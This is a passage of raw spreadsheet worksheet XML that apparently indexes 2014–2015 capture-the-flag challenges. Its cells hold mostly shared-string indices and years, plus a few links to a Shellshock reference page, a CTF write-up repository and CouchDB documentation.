      <c r="Y49" s="29"/>
      <c r="Z49" s="29"/>
    </row>
    <row r="50">
      <c r="A50" s="23" t="s">
        <v>362</v>
      </c>
      <c r="B50" s="24">
        <v>2014.0</v>
      </c>
      <c r="C50" s="23" t="s">
        <v>398</v>
      </c>
      <c r="D50" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E50" s="28"/>
      <c r="F50" s="23" t="s">
        <v>399</v>
      </c>
      <c r="G50" s="23" t="s">
        <v>401</v>
      </c>
      <c r="I50" s="29"/>
      <c r="J50" s="29"/>
      <c r="K50" s="29"/>
      <c r="L50" s="29"/>
      <c r="M50" s="29"/>
      <c r="N50" s="29"/>
      <c r="O50" s="29"/>
      <c r="P50" s="29"/>
      <c r="Q50" s="29"/>
      <c r="R50" s="29"/>
      <c r="S50" s="29"/>
      <c r="T50" s="29"/>
      <c r="U50" s="29"/>
      <c r="V50" s="29"/>
      <c r="W50" s="29"/>
      <c r="X50" s="29"/>
      <c r="Y50" s="29"/>
      <c r="Z50" s="29"/>
    </row>
    <row r="51">
      <c r="A51" s="5" t="s">
        <v>362</v>
      </c>
      <c r="B51" s="43">
        <v>2014.0</v>
      </c>
      <c r="C51" s="5" t="s">
        <v>409</v>
      </c>
      <c r="D51" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E51" s="5" t="s">
        <v>71</v>
      </c>
      <c r="F51" s="5" t="s">
        <v>411</v>
      </c>
      <c r="G51" s="3"/>
      <c r="H51" s="23"/>
      <c r="I51" s="29"/>
      <c r="J51" s="29"/>
      <c r="K51" s="29"/>
      <c r="L51" s="29"/>
      <c r="M51" s="29"/>
      <c r="N51" s="29"/>
      <c r="O51" s="29"/>
      <c r="P51" s="29"/>
      <c r="Q51" s="29"/>
      <c r="R51" s="29"/>
      <c r="S51" s="29"/>
      <c r="T51" s="29"/>
      <c r="U51" s="29"/>
      <c r="V51" s="29"/>
      <c r="W51" s="29"/>
      <c r="X51" s="29"/>
      <c r="Y51" s="29"/>
      <c r="Z51" s="29"/>
    </row>
    <row r="52">
      <c r="A52" s="23" t="s">
        <v>362</v>
      </c>
      <c r="B52" s="24">
        <v>2014.0</v>
      </c>
      <c r="C52" s="23" t="s">
        <v>413</v>
      </c>
      <c r="D52" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E52" s="23" t="s">
        <v>71</v>
      </c>
      <c r="F52" s="23" t="s">
        <v>414</v>
      </c>
      <c r="G52" s="23" t="s">
        <v>415</v>
      </c>
      <c r="J52" s="28"/>
      <c r="K52" s="28"/>
      <c r="L52" s="28"/>
    </row>
    <row r="53">
      <c r="A53" s="23" t="s">
        <v>362</v>
      </c>
      <c r="B53" s="24">
        <v>2014.0</v>
      </c>
      <c r="C53" s="23" t="s">
        <v>420</v>
      </c>
      <c r="D53" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E53" s="23" t="s">
        <v>71</v>
      </c>
      <c r="F53" s="23" t="s">
        <v>421</v>
      </c>
      <c r="G53" s="23" t="s">
        <v>422</v>
      </c>
      <c r="L53" s="28"/>
    </row>
    <row r="54">
      <c r="A54" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B54" s="43">
        <v>2014.0</v>
      </c>
      <c r="C54" s="5" t="s">
        <v>425</v>
      </c>
      <c r="D54" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E54" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F54" s="5" t="s">
        <v>426</v>
      </c>
      <c r="G54" s="5" t="s">
        <v>427</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="s">
        <v>424</v>
      </c>
      <c r="B55" s="43">
        <v>2014.0</v>
      </c>
      <c r="C55" s="5" t="s">
        <v>428</v>
      </c>
      <c r="D55" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E55" s="3"/>
      <c r="F55" s="5" t="s">
        <v>430</v>
      </c>
      <c r="G55" s="44" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="s">
        <v>434</v>
      </c>
      <c r="B56" s="5">
        <v>2014.0</v>
      </c>
      <c r="C56" s="5" t="s">
        <v>435</v>
      </c>
      <c r="D56" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E56" s="5" t="s">
        <v>42</v>
      </c>
      <c r="F56" s="5" t="s">
        <v>227</v>
      </c>
      <c r="G56" s="44" t="s">
        <v>227</v>
      </c>
      <c r="H56" s="36"/>
    </row>
    <row r="57">
      <c r="A57" s="36">
        <v>9447.0</v>
      </c>
      <c r="B57" s="36">
        <v>2014.0</v>
      </c>
      <c r="C57" s="36" t="s">
        <v>436</v>
      </c>
      <c r="D57" s="36" t="s">
        <v>23</v>
      </c>
      <c r="E57" s="36"/>
      <c r="F57" s="45" t="s">
        <v>438</v>
      </c>
      <c r="G57" s="45" t="s">
        <v>440</v>
      </c>
      <c r="H57" s="36" t="s">
        <v>441</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="36">
        <v>9447.0</v>
      </c>
      <c r="B58" s="36">
        <v>2014.0</v>
      </c>
      <c r="C58" s="36" t="s">
        <v>443</v>
      </c>
      <c r="D58" s="36" t="s">
        <v>48</v>
      </c>
      <c r="E58" s="36" t="s">
        <v>42</v>
      </c>
      <c r="F58" s="45" t="s">
        <v>444</v>
      </c>
      <c r="G58" s="13" t="s">
        <v>445</v>
      </c>
      <c r="H58" s="36" t="s">
        <v>446</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="36">
        <v>9447.0</v>
      </c>
      <c r="B59" s="36">
        <v>2014.0</v>
      </c>
      <c r="C59" s="36" t="s">
        <v>448</v>
      </c>
      <c r="D59" s="45" t="s">
        <v>449</v>
      </c>
      <c r="E59" s="23" t="s">
        <v>71</v>
      </c>
      <c r="F59" s="45" t="s">
        <v>450</v>
      </c>
      <c r="G59" s="45" t="s">
        <v>451</v>
      </c>
      <c r="H59" s="46" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#Initial_report_.28CVE-2014-6271.29","shellshock vuln")</f>
        <v>shellshock vuln</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="36">
        <v>9447.0</v>
      </c>
      <c r="B60" s="36">
        <v>2014.0</v>
      </c>
      <c r="C60" s="36" t="s">
        <v>456</v>
      </c>
      <c r="D60" s="36" t="s">
        <v>128</v>
      </c>
      <c r="E60" s="36" t="s">
        <v>51</v>
      </c>
      <c r="F60" s="45" t="s">
        <v>457</v>
      </c>
      <c r="G60" s="47" t="s">
        <v>458</v>
      </c>
      <c r="H60" s="36" t="s">
        <v>463</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B61" s="31">
        <v>2014.0</v>
      </c>
      <c r="C61" s="30" t="s">
        <v>465</v>
      </c>
      <c r="D61" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E61" s="35" t="s">
        <v>42</v>
      </c>
      <c r="F61" s="35" t="s">
        <v>466</v>
      </c>
      <c r="G61" s="32" t="s">
        <v>467</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B62" s="31">
        <v>2014.0</v>
      </c>
      <c r="C62" s="30" t="s">
        <v>469</v>
      </c>
      <c r="D62" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E62" s="35" t="s">
        <v>470</v>
      </c>
      <c r="F62" s="35" t="s">
        <v>466</v>
      </c>
      <c r="G62" s="35" t="s">
        <v>471</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="30" t="s">
        <v>472</v>
      </c>
      <c r="B63" s="31">
        <v>2014.0</v>
      </c>
      <c r="C63" s="30" t="s">
        <v>473</v>
      </c>
      <c r="D63" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E63" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F63" s="35" t="s">
        <v>475</v>
      </c>
      <c r="G63" s="35" t="s">
        <v>476</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="30" t="s">
        <v>472</v>
      </c>
      <c r="B64" s="31">
        <v>2014.0</v>
      </c>
      <c r="C64" s="30" t="s">
        <v>478</v>
      </c>
      <c r="D64" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E64" s="35" t="s">
        <v>25</v>
      </c>
      <c r="F64" s="35" t="s">
        <v>479</v>
      </c>
      <c r="G64" s="13" t="s">
        <v>480</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B65" s="24">
        <v>2014.0</v>
      </c>
      <c r="C65" s="23" t="s">
        <v>482</v>
      </c>
      <c r="D65" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E65" s="23" t="s">
        <v>25</v>
      </c>
      <c r="F65" s="23" t="s">
        <v>484</v>
      </c>
      <c r="G65" s="23" t="s">
        <v>485</v>
      </c>
      <c r="L65" s="28"/>
      <c r="M65" s="29"/>
      <c r="N65" s="29"/>
      <c r="O65" s="29"/>
      <c r="P65" s="29"/>
      <c r="Q65" s="29"/>
      <c r="R65" s="29"/>
      <c r="S65" s="29"/>
      <c r="T65" s="29"/>
      <c r="U65" s="29"/>
      <c r="V65" s="29"/>
      <c r="W65" s="29"/>
      <c r="X65" s="29"/>
      <c r="Y65" s="29"/>
      <c r="Z65" s="29"/>
    </row>
    <row r="66">
      <c r="A66" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B66" s="24">
        <v>2014.0</v>
      </c>
      <c r="C66" s="23" t="s">
        <v>491</v>
      </c>
      <c r="D66" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E66" s="23" t="s">
        <v>96</v>
      </c>
      <c r="F66" s="23" t="s">
        <v>492</v>
      </c>
      <c r="G66" s="41" t="s">
        <v>493</v>
      </c>
      <c r="L66" s="28"/>
      <c r="M66" s="29"/>
      <c r="N66" s="29"/>
      <c r="O66" s="29"/>
      <c r="P66" s="29"/>
      <c r="Q66" s="29"/>
      <c r="R66" s="29"/>
      <c r="S66" s="29"/>
      <c r="T66" s="29"/>
      <c r="U66" s="29"/>
      <c r="V66" s="29"/>
      <c r="W66" s="29"/>
      <c r="X66" s="29"/>
      <c r="Y66" s="29"/>
      <c r="Z66" s="29"/>
    </row>
    <row r="67">
      <c r="A67" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B67" s="24">
        <v>2014.0</v>
      </c>
      <c r="C67" s="23" t="s">
        <v>496</v>
      </c>
      <c r="D67" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E67" s="23" t="s">
        <v>497</v>
      </c>
      <c r="F67" s="23" t="s">
        <v>498</v>
      </c>
      <c r="G67" s="41" t="s">
        <v>500</v>
      </c>
      <c r="M67" s="29"/>
      <c r="N67" s="29"/>
      <c r="O67" s="29"/>
      <c r="P67" s="29"/>
      <c r="Q67" s="29"/>
      <c r="R67" s="29"/>
      <c r="S67" s="29"/>
      <c r="T67" s="29"/>
      <c r="U67" s="29"/>
      <c r="V67" s="29"/>
      <c r="W67" s="29"/>
      <c r="X67" s="29"/>
      <c r="Y67" s="29"/>
      <c r="Z67" s="29"/>
    </row>
    <row r="68">
      <c r="A68" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B68" s="43">
        <v>2014.0</v>
      </c>
      <c r="C68" s="5" t="s">
        <v>496</v>
      </c>
      <c r="D68" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E68" s="2" t="s">
        <v>25</v>
      </c>
      <c r="F68" s="5" t="s">
        <v>503</v>
      </c>
      <c r="G68" s="49" t="s">
        <v>505</v>
      </c>
      <c r="H68" s="3"/>
    </row>
    <row r="69">
      <c r="A69" s="5" t="s">
        <v>502</v>
      </c>
      <c r="B69" s="43">
        <v>2014.0</v>
      </c>
      <c r="C69" s="5" t="s">
        <v>512</v>
      </c>
      <c r="D69" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E69" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F69" s="5" t="s">
        <v>227</v>
      </c>
      <c r="G69" s="44" t="s">
        <v>92</v>
      </c>
      <c r="H69" s="5" t="s">
        <v>514</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="17">
        <v>42521.0</v>
      </c>
      <c r="B70" s="7"/>
      <c r="C70" s="6"/>
      <c r="D70" s="6"/>
      <c r="E70" s="6"/>
      <c r="F70" s="6"/>
      <c r="G70" s="6"/>
      <c r="H70" s="6"/>
      <c r="I70" s="8"/>
      <c r="J70" s="8"/>
      <c r="K70" s="9"/>
      <c r="L70" s="9"/>
      <c r="M70" s="9"/>
      <c r="N70" s="9"/>
      <c r="O70" s="9"/>
      <c r="P70" s="9"/>
      <c r="Q70" s="9"/>
      <c r="R70" s="9"/>
      <c r="S70" s="9"/>
      <c r="T70" s="9"/>
      <c r="U70" s="9"/>
      <c r="V70" s="9"/>
      <c r="W70" s="9"/>
      <c r="X70" s="9"/>
      <c r="Y70" s="9"/>
      <c r="Z70" s="9"/>
    </row>
    <row r="71">
      <c r="A71" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B71" s="40">
        <v>2014.0</v>
      </c>
      <c r="C71" s="40" t="s">
        <v>516</v>
      </c>
      <c r="D71" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F71" s="40" t="s">
        <v>517</v>
      </c>
      <c r="G71" s="13" t="s">
        <v>518</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B72" s="40">
        <v>2014.0</v>
      </c>
      <c r="C72" s="40" t="s">
        <v>519</v>
      </c>
      <c r="D72" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E72" s="40" t="s">
        <v>71</v>
      </c>
      <c r="F72" s="50" t="s">
        <v>520</v>
      </c>
      <c r="G72" s="40" t="s">
        <v>524</v>
      </c>
      <c r="H72" s="40" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B73" s="40">
        <v>2014.0</v>
      </c>
      <c r="C73" s="40" t="s">
        <v>526</v>
      </c>
      <c r="D73" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F73" s="40" t="s">
        <v>527</v>
      </c>
      <c r="G73" s="40" t="s">
        <v>528</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B74" s="40">
        <v>2014.0</v>
      </c>
      <c r="C74" s="40" t="s">
        <v>531</v>
      </c>
      <c r="D74" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E74" s="40" t="s">
        <v>535</v>
      </c>
      <c r="F74" s="40" t="s">
        <v>536</v>
      </c>
      <c r="G74" s="40" t="s">
        <v>537</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B75" s="40">
        <v>2014.0</v>
      </c>
      <c r="C75" s="40" t="s">
        <v>538</v>
      </c>
      <c r="D75" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E75" s="40" t="s">
        <v>25</v>
      </c>
      <c r="F75" s="40" t="s">
        <v>539</v>
      </c>
      <c r="G75" s="40" t="s">
        <v>540</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="40" t="s">
        <v>541</v>
      </c>
      <c r="B76" s="40">
        <v>2014.0</v>
      </c>
      <c r="C76" s="40" t="s">
        <v>542</v>
      </c>
      <c r="D76" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F76" s="40" t="s">
        <v>543</v>
      </c>
      <c r="G76" s="40" t="s">
        <v>544</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="40" t="s">
        <v>541</v>
      </c>
      <c r="B77" s="40">
        <v>2014.0</v>
      </c>
      <c r="C77" s="40" t="s">
        <v>545</v>
      </c>
      <c r="D77" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E77" s="40" t="s">
        <v>546</v>
      </c>
      <c r="F77" s="40" t="s">
        <v>548</v>
      </c>
      <c r="G77" s="40" t="s">
        <v>549</v>
      </c>
      <c r="H77" s="40" t="s">
        <v>551</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B78" s="40">
        <v>2014.0</v>
      </c>
      <c r="C78" s="40" t="s">
        <v>555</v>
      </c>
      <c r="D78" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E78" s="40" t="s">
        <v>71</v>
      </c>
      <c r="F78" s="40" t="s">
        <v>557</v>
      </c>
      <c r="G78" s="50" t="s">
        <v>558</v>
      </c>
      <c r="H78" s="51" t="s">
        <v>559</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B79" s="40">
        <v>2014.0</v>
      </c>
      <c r="C79" s="52" t="s">
        <v>561</v>
      </c>
      <c r="D79" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E79" s="40" t="s">
        <v>564</v>
      </c>
      <c r="F79" s="40" t="s">
        <v>565</v>
      </c>
      <c r="G79" s="50" t="s">
        <v>92</v>
      </c>
      <c r="H79" s="52" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B80" s="40">
        <v>2014.0</v>
      </c>
      <c r="C80" s="52" t="s">
        <v>567</v>
      </c>
      <c r="D80" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F80" s="40" t="s">
        <v>568</v>
      </c>
      <c r="G80" s="40" t="s">
        <v>570</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B81" s="40">
        <v>2014.0</v>
      </c>
      <c r="C81" s="40" t="s">
        <v>571</v>
      </c>
      <c r="D81" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F81" s="40" t="s">
        <v>572</v>
      </c>
      <c r="G81" s="40" t="s">
        <v>574</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B82" s="40">
        <v>2014.0</v>
      </c>
      <c r="C82" s="40" t="s">
        <v>575</v>
      </c>
      <c r="D82" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F82" s="40" t="s">
        <v>576</v>
      </c>
      <c r="G82" s="40" t="s">
        <v>577</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B83" s="43">
        <v>2014.0</v>
      </c>
      <c r="C83" s="5" t="s">
        <v>579</v>
      </c>
      <c r="D83" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E83" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F83" s="5" t="s">
        <v>582</v>
      </c>
      <c r="G83" s="5" t="s">
        <v>583</v>
      </c>
      <c r="H83" s="3"/>
    </row>
    <row r="84">
      <c r="A84" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B84" s="43">
        <v>2014.0</v>
      </c>
      <c r="C84" s="5" t="s">
        <v>585</v>
      </c>
      <c r="D84" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E84" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F84" s="5" t="s">
        <v>588</v>
      </c>
      <c r="G84" s="5" t="s">
        <v>590</v>
      </c>
      <c r="H84" s="3"/>
    </row>
    <row r="85">
      <c r="A85" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B85" s="43">
        <v>2014.0</v>
      </c>
      <c r="C85" s="5" t="s">
        <v>592</v>
      </c>
      <c r="D85" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E85" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F85" s="5" t="s">
        <v>594</v>
      </c>
      <c r="G85" s="5" t="s">
        <v>595</v>
      </c>
      <c r="H85" s="5" t="s">
        <v>596</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B86" s="43">
        <v>2014.0</v>
      </c>
      <c r="C86" s="5" t="s">
        <v>597</v>
      </c>
      <c r="D86" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E86" s="5" t="s">
        <v>232</v>
      </c>
      <c r="F86" s="5" t="s">
        <v>599</v>
      </c>
      <c r="G86" s="5" t="s">
        <v>227</v>
      </c>
      <c r="H86" s="54"/>
    </row>
    <row r="87">
      <c r="A87" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B87" s="43">
        <v>2014.0</v>
      </c>
      <c r="C87" s="5" t="s">
        <v>604</v>
      </c>
      <c r="D87" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E87" s="5" t="s">
        <v>300</v>
      </c>
      <c r="F87" s="5" t="s">
        <v>605</v>
      </c>
      <c r="G87" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H87" s="54"/>
    </row>
    <row r="88">
      <c r="A88" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B88" s="43">
        <v>2014.0</v>
      </c>
      <c r="C88" s="5" t="s">
        <v>608</v>
      </c>
      <c r="D88" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E88" s="54"/>
      <c r="F88" s="5" t="s">
        <v>610</v>
      </c>
      <c r="G88" s="13" t="s">
        <v>611</v>
      </c>
      <c r="H88" s="56" t="s">
        <v>612</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B89" s="43">
        <v>2014.0</v>
      </c>
      <c r="C89" s="5" t="s">
        <v>616</v>
      </c>
      <c r="D89" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E89" s="5" t="s">
        <v>617</v>
      </c>
      <c r="F89" s="5" t="s">
        <v>618</v>
      </c>
      <c r="G89" s="5" t="s">
        <v>227</v>
      </c>
      <c r="H89" s="54"/>
    </row>
    <row r="90">
      <c r="A90" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B90" s="31">
        <v>2014.0</v>
      </c>
      <c r="C90" s="30" t="s">
        <v>620</v>
      </c>
      <c r="D90" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E90" s="30" t="s">
        <v>621</v>
      </c>
      <c r="F90" s="35" t="s">
        <v>622</v>
      </c>
      <c r="G90" s="13" t="s">
        <v>623</v>
      </c>
      <c r="H90" s="57" t="s">
        <v>624</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B91" s="31">
        <v>2014.0</v>
      </c>
      <c r="C91" s="30" t="s">
        <v>626</v>
      </c>
      <c r="D91" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E91" s="30" t="s">
        <v>627</v>
      </c>
      <c r="F91" s="35" t="s">
        <v>628</v>
      </c>
      <c r="G91" s="35" t="s">
        <v>630</v>
      </c>
      <c r="H91" s="30" t="s">
        <v>631</v>
      </c>
      <c r="J91" s="58" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2014/tree/master/defkthon-ctf/web-300","WU")</f>
        <v>WU</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B92" s="31">
        <v>2014.0</v>
      </c>
      <c r="C92" s="30" t="s">
        <v>634</v>
      </c>
      <c r="D92" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E92" s="30" t="s">
        <v>635</v>
      </c>
      <c r="F92" s="35" t="s">
        <v>636</v>
      </c>
      <c r="G92" s="13" t="s">
        <v>637</v>
      </c>
      <c r="H92" s="33" t="str">
        <f>HYPERLINK("http://couchdb.readthedocs.io/en/latest/api/database/bulk-api.html#get--db-_all_docs","All_entries endpoint")</f>
        <v>All_entries endpoint</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="40" t="s">
        <v>638</v>
      </c>
      <c r="B93" s="40">
        <v>2014.0</v>
      </c>
      <c r="C93" s="40" t="s">
        <v>639</v>
      </c>
      <c r="D93" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E93" s="40" t="s">
        <v>96</v>
      </c>
      <c r="F93" s="40" t="s">
        <v>640</v>
      </c>
      <c r="G93" s="40" t="s">
        <v>641</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="40" t="s">
        <v>638</v>
      </c>
      <c r="B94" s="40">
        <v>2014.0</v>
      </c>
      <c r="C94" s="40" t="s">
        <v>642</v>
      </c>
      <c r="D94" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E94" s="40" t="s">
        <v>42</v>
      </c>
      <c r="F94" s="40" t="s">
        <v>643</v>
      </c>
      <c r="G94" s="40" t="s">
        <v>644</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="40" t="s">
        <v>638</v>
      </c>
      <c r="B95" s="40">
        <v>2014.0</v>
      </c>
      <c r="C95" s="40" t="s">
        <v>645</v>
      </c>
      <c r="D95" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F95" s="40" t="s">
        <v>646</v>
      </c>
      <c r="G95" s="40" t="s">
        <v>647</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="17">
        <v>42528.0</v>
      </c>
      <c r="B96" s="7"/>
      <c r="C96" s="6"/>
      <c r="D96" s="6"/>
      <c r="E96" s="6"/>
      <c r="F96" s="6"/>
      <c r="G96" s="6"/>
      <c r="H96" s="6"/>
      <c r="I96" s="8"/>
      <c r="J96" s="8"/>
      <c r="K96" s="9"/>
      <c r="L96" s="9"/>
      <c r="M96" s="9"/>
      <c r="N96" s="9"/>
      <c r="O96" s="9"/>
      <c r="P96" s="9"/>
      <c r="Q96" s="9"/>
      <c r="R96" s="9"/>
      <c r="S96" s="9"/>
      <c r="T96" s="9"/>
      <c r="U96" s="9"/>
      <c r="V96" s="9"/>
      <c r="W96" s="9"/>
      <c r="X96" s="9"/>
      <c r="Y96" s="9"/>
      <c r="Z96" s="9"/>
    </row>
    <row r="97">
      <c r="A97" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B97" s="31">
        <v>2014.0</v>
      </c>
      <c r="C97" s="30" t="s">
        <v>649</v>
      </c>
      <c r="D97" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E97" s="30" t="s">
        <v>650</v>
      </c>
      <c r="F97" s="35" t="s">
        <v>651</v>
      </c>
      <c r="G97" s="35" t="s">
        <v>652</v>
      </c>
      <c r="H97" s="33" t="s">
        <v>653</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="30" t="s">
        <v>654</v>
      </c>
      <c r="B98" s="31">
        <v>2014.0</v>
      </c>
      <c r="C98" s="30" t="s">
        <v>655</v>
      </c>
      <c r="D98" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E98" s="30" t="s">
        <v>650</v>
      </c>
      <c r="F98" s="35" t="s">
        <v>656</v>
      </c>
      <c r="G98" s="35" t="s">
        <v>657</v>
      </c>
      <c r="H98" s="30" t="s">
        <v>658</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="30" t="s">
        <v>654</v>
      </c>
      <c r="B99" s="31">
        <v>2014.0</v>
      </c>
      <c r="C99" s="30" t="s">
        <v>659</v>
      </c>
      <c r="D99" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E99" s="30" t="s">
        <v>660</v>
      </c>
      <c r="F99" s="30" t="s">
        <v>661</v>
      </c>
      <c r="G99" s="30" t="s">
        <v>658</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="40" t="s">
        <v>662</v>
      </c>
      <c r="B100" s="40">
        <v>2014.0</v>
      </c>
      <c r="C100" s="40" t="s">
        <v>663</v>
      </c>
      <c r="D100" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E100" s="40" t="s">
        <v>42</v>
      </c>
      <c r="F100" s="40" t="s">
        <v>664</v>
      </c>
      <c r="G100" s="40" t="s">
        <v>227</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B101" s="40">
        <v>2014.0</v>
      </c>
      <c r="C101" s="40" t="s">
        <v>666</v>
      </c>
      <c r="D101" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F101" s="40" t="s">
        <v>667</v>
      </c>
      <c r="G101" s="40" t="s">
        <v>668</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B102" s="40">
        <v>2014.0</v>
      </c>
      <c r="C102" s="40" t="s">
        <v>669</v>
      </c>
      <c r="D102" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F102" s="40" t="s">
        <v>670</v>
      </c>
      <c r="G102" s="40" t="s">
        <v>672</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B103" s="43">
        <v>2015.0</v>
      </c>
      <c r="C103" s="5" t="s">
        <v>675</v>
      </c>
      <c r="D103" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E103" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F103" s="5" t="s">
        <v>677</v>
      </c>
      <c r="G103" s="5" t="s">
        <v>227</v>
      </c>
      <c r="H103" s="3"/>
    </row>
    <row r="104">
      <c r="A104" s="60" t="s">
        <v>673</v>
      </c>
      <c r="B104" s="43">
        <v>2015.0</v>
      </c>
      <c r="C104" s="5" t="s">
        <v>680</v>
      </c>
      <c r="D104" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E104" s="3"/>
      <c r="F104" s="5" t="s">
        <v>681</v>
      </c>
      <c r="G104" s="5" t="s">
        <v>682</v>
      </c>
      <c r="H104" s="3"/>
    </row>
    <row r="105">
      <c r="A105" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B105" s="43">
        <v>2105.0</v>
      </c>
      <c r="C105" s="5" t="s">
        <v>683</v>
      </c>
      <c r="D105" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E105" s="3"/>
      <c r="F105" s="5" t="s">
        <v>684</v>
      </c>
      <c r="G105" s="5" t="s">
